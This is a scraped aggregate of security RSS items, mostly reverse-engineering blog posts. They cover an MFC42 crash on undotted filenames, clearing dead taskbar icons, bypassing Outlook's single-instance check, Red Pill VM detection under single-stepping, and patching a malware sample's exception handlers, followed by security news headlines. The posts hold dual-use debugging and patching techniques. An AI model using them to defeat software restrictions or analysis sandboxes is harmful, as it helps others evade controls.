    CALL DWORD PTR DS:[<&KERNEL32.GetModuleFileNameA>]
    LEA EAX,DWORD PTR SS:[EBP+szBuffer]
    PUSH 2E
    PUSH EAX
    CALL DWORD PTR DS:[<&msvcrt._mbsrchr>]
    POP ECX
    POP ECX
    MOV DWORD PTR SS:[EBP-80],EAX
    MOV BYTE PTR DS:[EAX],0          <-- Crash!

The code above is from MFC42.DLL, version 6.2.4131.0 from Windows XP SP2. It effectively does the following:

    GetModuleFileName(NULL, szBuffer, MAX_PATH);
    *(_mbsrchr(szBuffer, '.')) = 0;

The function _mbsrchr(...) returns NULL if the character searched for is not found. This means that if there is no '.' in the current process's filename (which was the case for the file I was testing) then the highlighted line above will try to write the byte 0x00 to address 0x00000000, which will cause a crash. I figured that this was some obscure function from MFC42.DLL that most applications don't make use of, however, after a little digging it turns out that this code is in CWinApp::SetCurrentHandles(), which is called by AfxWinInit(...). From http://msdn2.microsoft.com/en-us/library/w04bs753(vs.80).aspx: "[AfxWinInit] is called by the MFC-supplied WinMain function, as part of the CWinApp initialization of a GUI-based application, to initialize MFC." In other words, almost every MFC GUI program executes the code snippet above! As surprised as I was by this, I figured that surely this had been fixed for Vista. Believe it or not, the same issue exists!

Below is the code from MFC42.DLL version 6.6.8063.0 from Windows Vista Gold:

    PUSH 104
    LEA EDX,DWORD PTR SS:[EBP+szBuffer]
    MOV [EDI+0C],ECX
    MOV EAX,DWORD PTR DS:[ESI+6C]
    PUSH EDX
    PUSH EAX
    CALL DWORD PTR DS:[<&KERNEL32.GetModuleFileNameA>]
    TEST EAX,EAX
    JZ LOC_722F1484
    CMP EAX,104
    JZ LOC_722F1484
    LEA ECX,[EBP+szBuffer]
    PUSH 2E
    PUSH ECX
    CALL __mbsrchr
    MOV EBX,EAX
    ADD ESP,8
    TEST EBX,EBX
    MOV [EBP+VAR_310],EBX
    JZ LOC_7230DB7D
    ...

    __mbsrchr:
    MOV EDI,EDI
    PUSH EBP
    MOV EBP,ESP
    POP EBP
    JMP DWORD PTR DS:[<&msvcrt._mbsrchr>]

    LOC_7230DB7D:
    ...
    JMP DWORD PTR DS:[<&msvcrt.CxxThrowException>]

While the code above checks for the lack of a '.' in the filename, it still throws an exception and causes a crash if there's no '.'. The good news is that it doesn't seem easy to accidentally execute an executable file without a '.' in the filename in Vista:

    C:\>copy c:\windows\notepad.exe notepad_exe
            1 file(s) copied.
    C:\>notepad_exe
    'notepad_exe' is not recognized as an internal or external command,
    operable program or batch file.
    C:\>start notepad_exe
    [This opens the "Open With" dialog box in Explorer instead of executing the file.]

However, it is still possible to run non-dotted-files via API functions like CreateProcess(...) to cause the crash described above.
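The unchecked extension strip described in this post next to a checked form, as an added example that is not code from MFC or from the original post. It is portable C: strrchr stands in for _mbsrchr, the caller passes in the path and the length that GetModuleFileNameA would have returned, and the function names, PATH_CAP and the sample paths are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define PATH_CAP 260 /* MAX_PATH (0x104), the buffer size pushed in both listings */

enum strip_result {
    STRIP_OK = 0,       /* extension removed in place */
    STRIP_NO_EXTENSION, /* file name has no '.', path left untouched */
    STRIP_BAD_PATH      /* NULL buffer, or length reported as 0 or as the full buffer */
};

/* Same shape as the two-line C equivalent in the post, kept for comparison only.
 * With no '.' anywhere, strrchr() returns NULL and the store faults.
 * With a '.' only in a directory name, it silently cuts the path there. */
void strip_extension_unchecked(char *path)
{
    *(strrchr(path, '.')) = 0;
}

/* Start of the file-name component: one past the last '\\' or '/'. */
static char *file_component(char *path)
{
    char *sep = strrchr(path, '\\');
    char *fwd = strrchr(path, '/');

    if (fwd != NULL && (sep == NULL || fwd > sep))
        sep = fwd;
    return sep != NULL ? sep + 1 : path;
}

/* Checked form. reported_len is the value returned by the call that filled
 * the buffer: 0 means failure and PATH_CAP means the path may be truncated,
 * the same two cases the Vista listing tests before searching for '.'.
 * A missing extension is reported to the caller instead of raised. */
enum strip_result strip_extension_checked(char *path, size_t reported_len)
{
    char *dot;

    if (path == NULL || reported_len == 0 || reported_len >= PATH_CAP)
        return STRIP_BAD_PATH;

    /* Search only the file name, so a dotted directory is never cut. */
    dot = strrchr(file_component(path), '.');
    if (dot == NULL)
        return STRIP_NO_EXTENSION;

    *dot = '\0';
    return STRIP_OK;
}

int main(void)
{
    /* Constructed sample paths, not taken from a real system. */
    char samples[3][PATH_CAP] = {
        "C:\\windows\\notepad.exe",
        "C:\\windows\\notepad_exe",
        "C:\\tools.v2\\notepad_exe"
    };
    size_t i;

    for (i = 0; i < 3; i++) {
        enum strip_result r = strip_extension_checked(samples[i], strlen(samples[i]));
        printf("result=%d path=%s\n", (int)r, samples[i]);
    }
    return 0;
}
```

Both undotted samples come back as STRIP_NO_EXTENSION with the buffer unchanged, so the caller decides what a missing extension means.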

==> Refreshing the Taskbar Notification Area

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I am working on an automation system that involves forcefully terminating a process that creates an icon in the Taskbar Notification Area (no, not the "system tray"). It is the responsibility of the process that creates an icon in the Taskbar Notification Area to remove the icon when the process exits, however, since I am using TerminateProcess(...) to remotely kill the process, the code to remove the icon never gets executed. As such, the icon remains in the Taskbar Notification Area until one moves the mouse cursor over the icon, at which point it disappears. Since this is an automation system that's being developed, this icon-creating process will get executed many times, and if left unchecked would end up leaving hundreds of icons in the Taskbar Notification Area (one icon per execution). That's bad. Despite my best Googling efforts ("refresh notification area", "redraw system tray", etc.), I wasn't able to find elegant code to solve this problem. I found some novel solutions, though. The most common suggestion was to use SetCursor(...) to drag the mouse cursor around the Taskbar Notification Area; while this works, it's an ugly hack and is actually quite slow. One of my "favorite" suggestions was to try to associate each icon in the Taskbar Notification Area with a process, then monitoring each process for termination, then deleting the icon once the given process terminates (talk about overkill... geeze). When a user moves the mouse over a "dead icon" in the Taskbar Notification Area, some window message must get sent to the window to cause it to say to itself, "hey, the mouse is over me, so let me see if the process that created this icon is still alive.... Oh, it's not? Let me remove the icon, then." I wanted to find what window message was causing that code to fire so that I could send that message to the window myself. 
I started up Microsoft Spy++ and saw the following information for the Taskbar Notification Area and its parent windows:

A useful feature of Microsoft Spy++ is that it allows you to monitor window messages sent to a given window. I started monitoring the window messages getting sent to the "Notification Area" window without moving my mouse over the window and saw the following messages getting sent:

* TB_BUTTONCOUNT
* TB_GETBUTTONINFOW
* TB_SETBUTTONINFOW
* WM_PAINT
* WM_ERASEBKGND

The messages above clearly had nothing to do with me moving my mouse (since I wasn't moving my mouse over the window), so I configured Microsoft Spy++ to filter out those messages. Then I moved my mouse over the "dead icon" in question and saw the following messages:

    <00001> 00010056 S WM_NCHITTEST xPos:1491 yPos:1024
    <00002> 00010056 R WM_NCHITTEST nHittest:HTCLIENT
    <00003> 00010056 S WM_SETCURSOR hwnd:00010056 nHittest:HTCLIENT wMouseMsg:WM_MOUSEMOVE
    <00004> 00010056 R WM_SETCURSOR fHaltProcessing:False
    <00005> 00010056 P WM_MOUSEMOVE fwKeys:0000 xPos:5 yPos:0
    <00006> 00010056 S TB_HITTEST pptHitTest:022BFC18
    <00007> 00010056 R TB_HITTEST iIndex:0
    <00008> 00010056 S TB_DELETEBUTTON iButton:0
    <00009> 00010056 R TB_DELETEBUTTON fSucceeded:True

Aha! So either WM_NCHITTEST, WM_SETCURSOR, WM_MOUSEMOVE, or TB_HITTEST leads to the TB_DELETEBUTTON getting sent. After trying to send each window message manually with SendMessage(...), I found which window message was the catalyst: WM_MOUSEMOVE.

With this new-found knowledge, I was able to whip up the following code to refresh the Taskbar Notification Area:

    #include <windows.h>

    #define FW(x,y) FindWindowEx(x, NULL, y, L"")

    void RefreshTaskbarNotificationArea()
    {
        HWND hNotificationArea;
        RECT r;

        // Walk Shell_TrayWnd -> TrayNotifyWnd -> SysPager down to the
        // "Notification Area" toolbar and fetch its client rectangle.
        // GetClientRect fails if the window was not found, so stop there.
        if (!GetClientRect(
                hNotificationArea = FindWindowEx(
                    FW(FW(FW(NULL, L"Shell_TrayWnd"), L"TrayNotifyWnd"), L"SysPager"),
                    NULL,
                    L"ToolbarWindow32",
                    L"Notification Area"),
                &r))
            return;

        // Send WM_MOUSEMOVE across the toolbar in 5-pixel steps; lParam
        // carries x in the low word and y in the high word.
        for (LONG x = 0; x < r.right; x += 5)
            for (LONG y = 0; y < r.bottom; y += 5)
                SendMessage(
                    hNotificationArea,
                    WM_MOUSEMOVE,
                    0,
                    (y << 16) + x);
    }

==> Stateless Bi-Directional Proxy

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx After submitting my first patent two years ago to the US Patent Office, it has finally been published online! You can read all the juicy details here and you can see diagrams here if you have a TIFF-renderer browser plug-in. This patent was from when I was still on the Firewall team at Microsoft, so it's network-related. The other patents of mine that should get published on the web over the next two years are from when I was on the Anti-Malware team at Microsoft, so they're related to binary analysis... in other words, even cooler than this one ;)

==> Investigating Outlook's Single-Instance Restriction (PART 1)

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx If you use Outlook and have multiple e-mail account profiles, you know how frustrating it is to have Outlook restrict you to a single running instance of Outlook per interactive login. For those of you not familiar with this "feature", here's the scoop: if you have one instance of Outlook running and then launch another instance, a new Outlook window is created in the context of the original instance, but you don't have the option to load another e-mail account profile. This is a pain because it requires you to close and restart Outlook each time you want to check a different e-mail account (assuming you have a separate profile for each account). Tim Mullen, a colleague of mine, had the ingenious idea of using RunAs to launch the second Outlook process as another user, to try to circumvent whatever "feature" was restricting Outlook to a single instance. "What a great idea!" I thought, and I kicked myself for not having thought of that myself! But when we tested it out, it had the same results as running a second instance of Outlook without RunAs; an extra window popped up for the first instance and we weren't given the option to load another profile. This piqued my interest and I wondered how Outlook was determining whether or not another instance was already running in the interactive login session. Typically when I'm trying to figure out how specific functionality works, I have an API function or string to use as my guide. For example, if I'm red-teaming a DRM solution and I get a message box saying, "Invalid license key." then I can search in the binary for that string to see what code references it, or I can set a breakpoint on the Windows API functions that display message boxes. However, for the case of Outlook here, I didn't have any strings to base my investigation on, and I didn't know which API function(s) were being used to check for the first instance. 
My first idea was to use an API logging tool like AutoDebug and run it once on the first Outlook session and once on the second Outlook session. I could then compare the API call logs and see where they differed, and then begin to investigate what caused them to differ at that point. However, I quickly found that API loggers such as AutoDebug are not suited for such a heavyweight program as Outlook (which imports a few thousand DLLs and a few million API functions (yes, I'm exaggerating, but it's still a lot)). My second idea was to use a conditional-branch logger, such as http://www.woodmann.com/ollystuph/Conditional_Branch_Logger_v1.0.zip and run the same comparison as described above. However, I didn't have that plugin downloaded at the time and I didn't have Internet access, so I had to make-do with what was already on my laptop. I used Process Explorer to watch what happens when the second instance of Outlook is launched. Sure enough, the process starts and then terminates. So I used OllyDbg to set a breakpoint on ExitProcess(...) to see if I could get a decent call-stack to see what code in Outlook led to the ExitProcess(...) call. The good news is that this allowed me to find the code that led to the process termination. The bad news is that it was called via _cexit(...) from ___tmainCRTStartup(...), so whatever code was detecting the first instance of Outlook was bailing out via ret's, not via a direct call to _cexit(...) or ExitProcess(...). This led me to the old trustworthy Trial-and-Error-with-F8 method. The idea is simple -- starting from the process's Entry Point, step over (F8 in OllyDbg) every function call until you see the desired results, at which point you know the code in question lies within that function call. For this case, I was watching for a new window to pop up in the context of the first Outlook instance; by that time the check would already have been made to see if another instance of Outlook was running. 
The great thing about this approach is that it's incredibly straight-forward. The downside is that if you're looking for functionality that doesn't happen near the beginning of the process execution, it can be very time consuming. Luckily though, this method worked like a charm for Outlook! I started the second Outlook process in OllyDbg, stepped over the first call and into a jump. No windows popped up yet, so I hadn't yet stepped over the call-in-question. I kept pressing F8 until I found that when I tried stepping over the call from address 0x2FD251C8 (this of course is specific to my computer; your addresses will differ), an Outlook window popped up in the context of the first Outlook process. So I set a breakpoint on 0x2FD251C8 and restarted my second Outlook process, this time stepping in (F7) to that call and pressing F8 again until I found the next call that opened the first Outlook window. I found that stepping over the call at address 0x2FD25228 caused the window to pop up, so I set a breakpoint on that address, restarted, stepped in, and continued this process for about two minutes until I found the following code:

    .text:30006BB7 push offset WindowName ; "Microsoft Outlook"
    .text:30006BBC push offset aMspim_wnd32 ; "mspim_wnd32"
    .text:30006BC1 mov [ebp+var_42C], edi
    .text:30006BC7 call ds:FindWindowA

This looks like the culprit! During Outlook's initialization, it checks to see if a window named "Microsoft Outlook" with class name "mspim_wnd32" exists, and if so, it assumes that another instance is already running. To test this, I set the return value of FindWindowA(...) from the call above to NULL, and Outlook opened a full second instance of itself in a separate process, and allowed me to use a different account profile. This is a great example of where a very straight-forward reverse-engineering approach (Trial-and-Error-with-F8) can yield excellent results in just a few minutes given the right conditions.
As a disclaimer, I don't know the reason that the Outlook development team decided to restrict Outlook to a single instance. Perhaps multiple instances will cause massive data corruption. In other words, if you're going to patch your Outlook executable so that it does allow for multiple instances, do so at your own risk! This post continued in Part 2.

==> Career Shift

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx Friday, April 20th will be my final day at Microsoft. I will be joining NGS in the coming weeks as a Principal Security Consultant. I've copied all of my old blog posts from http://blogs.msdn.com to http://www.malwareanalysis.com though unfortunately I was not able to save the old comments. My new personal e-mail address is jasonATmalwareanalysisDOTcom.

==> When the Red Pill is Hard to Swallow

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I was looking at a malware sample last week that used a variation of Joanna Rutkowska's infamous Red Pill (http://invisiblethings.org/papers/redpill.html) to determine whether or not the malware was being run from inside a Virtual Machine. Based on the Red Pill concept, the guest OS's IDTR should be different from the host OS's IDTR. I was using Virtual PC to step through the malware sample in OllyDbg, with the goal of skipping the conditional-jump after SIDT led to the detection of my VM (see http://download.intel.com/design/Pentium4/manuals/25366720.pdf#page=275 for details on the SIDT instruction). You can imagine my surprise when SIDT returned 0x8003F400 as the base address of the IDT, which is the same base address of the IDT for my host Windows XP system! My first thought was that maybe the Virtual PC team figured out some ingenious way to make this happen via the Virtual Machine Additions add-on (see http://www.microsoft.com/technet/prodtechnol/virtualserver/2005/proddocs/vs_tr_components_additions.mspx?mfr=true). So I uninstalled Virtual Machine Additions, rebooted, and tried again. To my continued surprise, OllyDbg was still showing the host OS's IDTR when stepping through the SIDT instruction on my guest OS. After some more thinking, I thought, "maybe it has something to do with the fact that I'm single-stepping through SIDT in OllyDbg." To test this hypothesis, I set a breakpoint after the SIDT instruction, and ran the program from the start. Sure enough, SIDT returned 0xF9CB6440 as the base address of the IDT that time. The whole trick behind the Red Pill is that VMs don't typically have the opportunity to intercept SIDT since it's not a privileged instruction. 
However, when the Trap Flag is set (due to single-stepping), Virtual PC intercepts the int 1 interrupt and can execute the current instruction however it pleases; when it has the opportunity, it will use the host's IDTR for the SIDT instruction. Hopefully this knowledge will make the Red Pill a little easier for you to swallow (or spit-out if the Trap Flag is set).

==> Terms of the Trade

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx It is common to hear reverse engineers throw around the phrase, "forty-thousand hex." To someone unfamiliar with reverse engineering or debugging in Windows, this phrase would probably be interpreted to mean the value 0x00040000. However, when reverse engineers say, "forty-thousand hex," they are actually referring to the value 0x00400000. The value 0x00400000 is commonly seen when doing low-level work in Windows because this is the default base address of EXE files compiled by Microsoft's C++ compiler. So why say "forty-thousand hex" instead of "four-hundred-thousand hex"? For starters, the former is easier to say (one less syllable) than the latter. But more importantly, hexadecimal numbers are usually grouped in sets of 2-digits (bytes) instead of in groups of 3-digits as in base 10. As such, a reverse engineer could read 0x00400000 as 0x00,40,00,00. Going from right-to-left, we have 00 in the tens place, 00 in the hundreds place, and 40 in the thousands place.

==> Circumventing custom SEH

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I do most of my malware analysis statically, which is to say that I typically analyze malware by looking at a static disassembly of it as opposed to stepping through it in a debugger. However, sometimes I come across complicated or confusing code that would be easier to understand by walking through it in a debugger. I came across such an example the other day. An important branch decision was being made based on the result of a function that used a stack variable that IDA Pro couldn't represent in a simple way. Here's a snippet from the function:

    mov edx, [ebp+arg_0]
    add edx, 108h
    push edx

I could have traced back in the disassembly to figure out what arg_0 + 108h was really pointing to (it turned out to be a global variable and arg_0 was set by the caller of the caller of this function), but I thought that I could save time by loading the target into a debugger and setting a breakpoint on the code above in order to determine what was actually being pushed. There was a problem, though. This malware launched other instances of itself, and setting a breakpoint on the code above in a debugger didn't work since the parent process never executed that code, only the child instances did. I could have set a breakpoint on CreateProcessA(...), forced it to load the child processes in a suspended state, attached a debugger to the children, then resumed them, but this was more trouble than it was worth. Instead, I opted for another method of attack. I configured my debugger for Just-In-Time (JIT) debugging (see http://support.microsoft.com/default.aspx?scid=kb;en-us;103861) so that I could attach to a crashed process via the Microsoft Application Error Reporting dialog box (also known as "Dr. Watson" -- see http://blogs.msdn.com/oldnewthing/archive/2005/08/10/449866.aspx).

I then overwrote the code above with an int 3 and patched the file, with the expectation that after running the parent program that this would crash the child process, cause the Microsoft Application Error Reporting dialog box to pop up, and allow me to attach to the crashed child process. (It should be noted that this was done on an isolated network in a very controlled environment, and with all of our safeguards in place it was practically impossible for the modified malware to get out of our secure lab.) I saved the patched file and ran it, waiting eagerly for the Microsoft Application Error Reporting dialog box to appear. To my surprise, nothing happened. As it turned out, the program was using custom Structured Exception Handling (SEH) routines and because of this the int 3 exception was never passed to the operating system so the Microsoft Application Error Reporting dialog box never popped up. To remediate this, I changed my int 3 patch to the following:

    mov eax, fs:[0]
    mov [eax+4], 7c8399f3h
    int 3

This effectively overwrote the first exception handler in the SEH chain (see http://www.microsoft.com/msj/0197/exception/exception.aspx) with the default exception handler from kernel32.dll. The address of this handler is of course version-specific; in my case kernel32.dll was US English version 5.1.2600.2180. With this patch in place, the Microsoft Application Error Reporting dialog box popped up for the child process and I was able to attach my debugger and determine the value of arg_0 + 108h from the original code above.

==> FortiExplorer 2.3.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiExplorer 2.3.0 B1052 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * MS Windows 7, MS Windows Vista, MS Windows XP, * Mac OS X 10.6

==> FortiExplorer 2.2.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiExplorer 2.2.0 B1046 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * MS Windows 7, MS Windows Vista, MS Windows XP, * Mac OS X 10.6

==> Microsoft attempts legal action to disrupt some Zeus botnets

http://rss.techtarget.com/981.xml Legal and technical actions could disrupt some Zeus botnet operations by seizing command-and-control servers in Pennsylvania and Illinois.

==> Secure Application Development

http://securosis.com/feeds/research Secure application development is about building secure software. Most security products offer band-aid protection for existing applications: they filter, block, or proxy communications to/from applications that are incapable of protecting themselves. We want to get away from this “Features first, security second” model and code applications that are self-reliant and can protect themselves. The secure code movement is in its infancy. There are different processes, training programs, and tools to aid the development of secure applications – which we will cover here. We will also reference some of the OWASP and Rugged Software projects.

Papers and Posts
------------
* FireStarter: Agile Development and Security
* Comments on Microsoft Simplified SDL
* Rock Beats Scissors, and People Beat Process
* FireStarter: Secure Development Lifecycle – You’re Doing It Wrong
* Structured Security Program, Meet Agile Process
* FireStarter: For Secure Code, Process Is a Placebo – It’s All about Peer Pressure
* Are Secure Web Apps Possible?
* Clickjacking Details, Analysis, and Advice

Presentations
---------
Security + Agile = FAIL

Podcasts, Webcasts, and Multimedia
We do not currently have multimedia for this topic.

Vendors
---
We’ll include white and black box analysis, fuzzing, and tools vendors. This list is currently evolving, and we’ll include other firms as time permits.
* Cigital
* HP (SpiDynamics, Fortify)
* IBM (Ounce)
* Veracode
* WhiteHat Security

==> Encryption

http://securosis.com/feeds/research

Papers and Posts
------------
If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments).
1. The most important piece of work we’ve published on encryption is Understanding and Selecting a Database Encryption or Tokenization Solution.
2. Your Simple Guide to Endpoint Encryption.
3. Post on the Three Laws of Data Encryption.
4. Format and Datatype Preserving Encryption
5. Post on When to Layer Encryption.
6. Application vs. Database Encryption.
7. The post Database Media Protection focuses on threats to storage media, and some follow-up comments on Database Media Threats.
8. The Data Security Lifecycle covers encryption during the movement and storage of data.

General Coverage
------------
1. Tokenization Will Become the Dominant Payment Transaction Architecture
2. Visa’s Data Field Encryption
3. Boaz Nails It- The Encryption Dilemma
4. “PIN Crackers” and Data Security, looking at attacks on encryption.
5. Part of the core value of Data Centric Security is the ability to protect data regardless of where it moves or resides, which is facilitated by encryption. This is discussed in Part 1 and Part 2 of the Best Practices for Endpoint Security.
6. An editorial on how parts of the U.S. intelligence community discourage the adoption of encryption, as it is counterproductive to their mission.
7. This post discusses Digital Rights Management (DRM) as it pertains to Cloud Computing and content protection.

Presentations
---------
* Presentation on Data Breaches and Encryption.
* Presentation on Data Protection in the Enterprise. This is a corporate overview.
* This presentation is on Encrypting Mobile Data for the Enterprise.

Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic.

Vendors/Tools
---------
The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). Being here does not imply any endorsement; this list is simply meant to assist you should you start looking for tools. Please email info@securosis.com if you have any additions or corrections.

Enterprise/General Encryption Providers
* Certicom.
* CheckPoint.
* Entrust.
* GuardianEdge.
* IBM.
* nuBridges.
* Prime Factors Inc.
* RSA.
* SafeNet.
* Sophos (Utimaco).
* Symantec (PGP).
* Thales (nCipher)
* TrueCrypt.
* Venafi.
* Voltage.
* Vormetric.
* WinMagic.

Endpoint Encryption Vendors
* beCrypt.
* Credant.
* DESLock.
* McAfee (SafeBoot).
* Microsoft (BitLocker).
* Namo.
* Secude.
* Secuware.

Database Encryption Vendors
* IBM.
* NetLib.
* Oracle.
* Relational Wizards.
* RSA (Valyd).
* SafeNet (Ingrian).
* Sybase.
* Thales (nCipher).
* Voltage.
* Vormetric.

Key Management, Certificate and other tools
* Entrust.
* Prime Factors Inc.
* RSA
* Symantec (Verisign).
* Thales

==> Cloud Computing Security

http://securosis.com/feeds/research This section of the research library is dedicated to all things Cloud. Mostly we will cover Cloud Security, but along with this we need to have some understanding of what ‘The Cloud’ actually is, and what the major variations look like. We will also cover SaaS and Virtualization under this space; not because they are ‘The Cloud’, but they involve a Cloud-like model in many cases. We will be adding a lot of content to this section in the coming weeks.

Papers and Posts
------------
* Rich’s series defining a Cloud Security Data Lifecycle: Introduction, Create, Store, Use, Share, Archive and Delete.
* Securing the Cloud with Virtual Private Storage.
* How The Cloud Destroys Everything I Love about Web Application Security.

Presentations
---------
* Understanding Cloud Security in 30 Minutes or Less!

Podcasts, Webcasts and Multimedia
Chris Hoff co-hosts the Network Security Podcast, and talks about the Microsoft/EM partnership, Liquid Machines and Information Centric Security. Oh, he mentions a few things on ‘The Cloud’ too.

==> More DEF CON 19 News

https://www.defcon.org/defconrss.xml Things are starting to heat up for DEF CON 19! Here are a few of the recent developments:

DEF CON Scavenger Hunt has SPONSORS!!
ThinkGeek.com and evilmadscientist.com are confirmed sponsors of the scavenger hunt, they will be offering up prizes and special offers. They won't announce specific prizes until at Def con but good news is we know that Think Geek will be offering a discount code, usable for ordering off their website during the convention, limited time offer! The coupon code for ThinkGeek DEF CON attendees will be made available at the Scavenger Hunt table in the contest area and will be announced via our twitter feeds @_Defcon_ and @defconscavhunt. Here is a throwback to the past! Check out this Scavenger hunt list from 14yrs ago! We hope you enjoy a little nostalgia from DEF CON 5 courtesy of Mike Schrenk!

Skytalks CFP is Open!
From the DEF CON Forums:
TLDR:
Who: You
What: Skytalks IV CFP
When: Now - CFP Closes 23:59:59 MDT (UTC-06) 31 May 2011
Why: Because you've got the warez to share
Where: dcskytalks@gmail.com - WE RESERVE THE RIGHT TO POINT AND LAUGH IF WE CAN'T READ YOUR bleep IN A TEXT EDITOR. THIS MEANS YOU, MICROSOFT WORD USERS.
Updates: http://is.gd/5Y8eyM
Back by popular demand, Skytalks returns for its fourth year of technical prowess, side-track talks, and semi-coherent rants by some of the legends of the community. Never mind that we aren't actually IN a skybox this year, we'll still fill it to capacity, have lines running down the hallways for three talks in advance, and we'll recapture that original Defcon spirit and party like it's 1992.
You can track the movements of Skytalks on Facebook and Twitter as well:
Facebook: http://is.gd/0d8skZ
Twitter: @dcskytalks

DC101 Site
You can keep up on what's happening with DEF CON 101 by checking out the new site at http://defcon.stotan.org/dc101/

DEF CON 19 Vendor Area!
The vendor area at DEF CON 19 is growing by 1000 sq. ft. this year, so all of your favorite vendors will be back and maybe a few new ones! If you are interested in becoming a Vendor at DEF CON, Roamer has posted the updated Vendor FAQ at: http://defcon.hackingyour.net/vendor-FAQ.html

As always, you can keep up on all of the latest DEF CON 19 news at https://www.defcon.org, the DEF CON RSS Feed, The DEF CON Twitter, or on the DEF CON Facebook Page!

==> Todd Moore, Treasure hunter contestant, spoke at DEFCON 12 on "Cracking Net2Phone"

https://www.defcon.org/defconrss.xml Since Todd has been announced as a participant on NBC's new show "Treasure Hunters" we have had more than enough curious folks interested in his presentation. We will be watching him on the new show when it airs, in the meantime you can watch him now on his Defcon 12:"Cracking Net2Phone" Presentation. Do you think using Internet Telephony is more secure than a regular phone? Think again! Internet Telephony is becoming more common and those that think it is safer from wiretaps than regular phone communications are wrong. This presentation will demonstrate how to decrypt Net2Phone's dialed phone numbers, and playback fully reconstructed audio conversations from network packet captures. Included will be a demonstration of NetWitness 5.0's VOIP playback capability. Todd Moore is the product manager of NetWitness, a commercially available cyber-forensics tool. Moore's extensive knowledge of Internet technologies, network security, and software development helped make NetWitness well-known for providing powerful insight into network traffic. Moore has over ten years of professional experience in the field of network security and has extensive experience developing commercial software applications. He has a bachelor in Computer Science from Old Dominion University and is a Microsoft Certified Solution Developer (MCSD). Moore started with CTX Corporation in 1996 securing global intranets and designing network security software to help audit and analyze network traffic. He joined Forensics Explorers, a Division of ManTech ISandT, as Director of Software Development in 1999 and later became the NetWitness Product Manager. Moore teaches classes on designing quality software and has made numerous television appearances presenting the latest in technology trends. He has two patent pending inventions in the field of cyber-forensics. Moore resides in the greater Washington, D.C. area.

==> remote - MS13-037 Microsoft Internet Explorer textNode Use-After-Free

http://www.1337day.com/rss

==> The Risks of Microsoft Exchange Features that Use Oracle Outside In

http://www.cert.org/blogs/vuls/rss.xml The WebReady and Data Loss Prevention (DLP) features in Microsoft Exchange greatly increase the attack surface of an Exchange server. Specifically, Exchange running on Windows Server 2003 is particularly easy to exploit.

==> Microsoft's Botnet Takedown Campaign: 10 Reasons It Keeps Doing It

http://www.eweek.com/rss-feeds-45.xml NEWS ANALYSIS: Microsoft has successfully worked with the FBI to take down a $500 million botnet. But why it's working so hard to root out botnets might have to do with more than just your security.

==> Microsoft, FBI Shutter Citadel Botnets Seeking to End $500M Crime Spree

http://www.eweek.com/rss-feeds-45.xml Microsoft, financial groups and the FBI cooperated to take down botnets that used the Citadel bot software to control as many as 5 million compromised systems.

==> Microsoft: SMB Cloud Security Worries Easing

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Microsoft survey of 211 small businesses finds half use the cloud and after early experience, find it more reliable, secure.

==> Microsoft, FBI Trumpet Citadel Botnet Takedowns

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Joint operation is first in which law enforcement and private sector use civil seizure warrant to disrupt massive malware attack.

==> Patch Tuesday preview: June 2013

http://www.infosecurity-magazine.com/rss/news/ There are only five security bulletins from Microsoft this month, but with one involving versions of Internet Explorer from 6 to 10, and another involving an actively exploited Office vulnerability, administrators cannot afford to delay implementation.

==> Microsoft and the FBI take down more than 1000 Citadel botnets

http://www.infosecurity-magazine.com/rss/news/ Working with the FBI and the financial services industry, Microsoft last week obtained a court order allowing it to cut communications between 1462 Citadel botnets and the millions of infected PCs around the world.

==> Secunia names new CEO

http://www.infosecurity-magazine.com/rss/news/ Secunia, the Copenhagen-based provider of security software, announced the appointment of Microsoft's Peter Colsted as the firm's new chief executive.

==> Cisco challenges Microsoft’s acquisition of Skype

http://www.infosecurity-magazine.com/rss/news/ Cisco has challenged the EC's approval of Microsoft's $8.5 billion acquisition of Skype in 2011 in the Luxembourg General Court. If Cisco is successful, the EC would be forced to annul its earlier approval.

==> Microsoft unveils cloud-based, real-time botnet info-sharing initiative

http://www.infosecurity-magazine.com/rss/news/ Microsoft has kicked off the Cyber Threat Intelligence Program (C-TIP), an outgrowth of its information-sharing initiative around botnets.

==> Is the Xbox One a Covert Surveillance Device?

http://www.infosecurity-magazine.com/rss/news/ When details about Microsoft's new games console, the Xbox One, first began to emerge, privacy campaigners were immediately concerned: is the Xbox One an intrusive but covert surveillance device?

==> Microsoft Stops Predicting AV Samples to Focus on Ecosystem

http://www.infosecurity-magazine.com/rss/news/ The Microsoft Malware Protection center is shifting its research focus away from predicting test samples and instead focussing on prevalence-weighted response and family research.

==> Skype Beta Plugs IP Resolver Privacy Leak

http://www.krebsonsecurity.com/feed/ A few months ago, I warned readers that a glaring privacy weakness in voice-over-IP telephony service Skype allows anyone using the network to quickly learn the Internet address of any other Skype user. A new beta version of the popular Microsoft program appears to have nixed that privacy leak with a setting that restricts this capability to connections in your Skype contacts only.

==> IT Compliance Management Guide

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml This Solution Accelerator can help you shift your governance, risk, and compliance (GRC) efforts from people to technology. Use its configuration guidance to help efficiently address your organization's GRC objectives. See the online job aids for compliance.

==> Microsoft Operations Framework (MOF) 4.0

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml MOF 4.0 delivers practical guidance for everyday IT practices and activities, helping users establish and implement reliable, cost-effective IT services for governance, risk, and compliance (GRC) activities.

==> Security Compliance Management Toolkit

